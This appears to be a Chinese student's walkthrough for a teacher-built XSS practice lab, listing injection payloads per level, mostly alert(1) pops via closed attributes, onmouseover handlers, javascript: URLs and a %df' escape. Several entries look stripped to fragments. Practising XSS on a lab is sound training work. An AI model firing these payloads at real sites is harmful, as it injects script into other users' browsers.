自用XSS闯关攻略

老师搭建了一个让我们练手的XSS闯关平台,在这里跟大家分享一下,希望在学XSS的同学看过之后能有收获链接如下:

http://114.115.183.86/zk/xsstest/xss_platform/code/xss01/index.php?name=chao

只要我们能使用JavaScript语言让页面出现一个弹框就算闯关成功,如果页面没能正常跳转,在URL中将xss01改成对应关卡就行
例如第8关: xss08


1.随便在name=后面加入一句XSS测试就可以

2.">
3.'>
4.">
5.">
6.">
7.">
8."> alert`1`
9.">   或  ">
10." οnmοuseοver=alert(1)  //
11."> chao      点击超链接chao

自用XSS闯关攻略_第1张图片


12."  οnmοuseοver=alert(1)//
13. " οnmοuseοver=alert`1`//
14. " οnmοuseοver=alert`1`//
15. " οnmοuseοver=alert`1`//
16.javaScript:alert(1)
17. javascript:alert(1)//http://
18.serach=123&&type=2"> //
19.?name=xiaoming";  alert(1)//
20.在留言者这里直接写下  chao


还有一个闯关题,复制下面的链接就可以
http://114.115.183.86/zk/xss_test.php?t3="
老师搭建的一个只有三个题
yi.      ' οnmοuseοver=alert(1) > //
er.     %df'> //
san.    " οnmοuseοver=alert(1) //



你可能感兴趣的:(XSS闯关)